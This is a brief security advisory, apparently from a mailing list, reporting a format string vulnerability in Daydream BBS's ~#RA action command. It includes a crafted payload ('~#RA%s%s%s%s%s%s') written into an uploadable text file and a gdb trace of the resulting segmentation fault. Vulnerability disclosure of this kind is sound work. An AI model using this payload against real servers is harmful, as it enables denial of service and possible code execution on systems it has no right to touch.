Daydream BBS Format strings issue.

[KF <dotslash () snosoft com>]

Daydream BBS recently underwent some security changes.Although the 
buffer overflow
was fixed in the ~#RA command I am not sure if a format strings issue  
was addressed Its my 
understanding that the users of daydream have the option of adding 
"Action commands"
("~#RA being one of them")into the text files that they post. If a user 
forms a specialy crafted
text file uploads to daydream and then views the message using the menu 
system the issue
could be exploited.


background info:

~#RA[FILE]|[max]|
       Show random textfile. Format for file is "/path/foobar%d.ext",
where %d is a random
       number (1-[max]).

example:

echo "~#RA%s%s%s%s%s%s" > filetoupload.gfx. Then place this file on the server and view it via the menu system.


Simple test to proove existance:
[root@linuxppc <mailto:root@linuxppc> bbs]# echo "~#RA%s%s%s%s%s%s" > display/iso/welcome.gfx



                  ·| All accounts deleted - login |·

                  :|           as NEW!            |:

                 .:|                              |:.

          . ....:::|      NEW / CHAT / LOGOFF     |:::.... .

                   `------------------------------'


Username: test

Password: ****

Program received signal SIGSEGV, Segmentation fault.

formatted_print (buffer=0x7fffda48 '-' <repeats 70 times>, ")\n",

 flags=268615586) at typetext.c:594

594                                     *cm++ = *sr++;

(gdb) bt

#0  formatted_print (buffer=0x7fffda48 '-' <repeats 70 times>, ")\n",

 flags=268615586) at typetext.c:594


(gdb) x/10s $r1

0x7fffd440:      "\177ÿÚ\220\020\001Öì%s%s%s%s%s%s\n"



-KF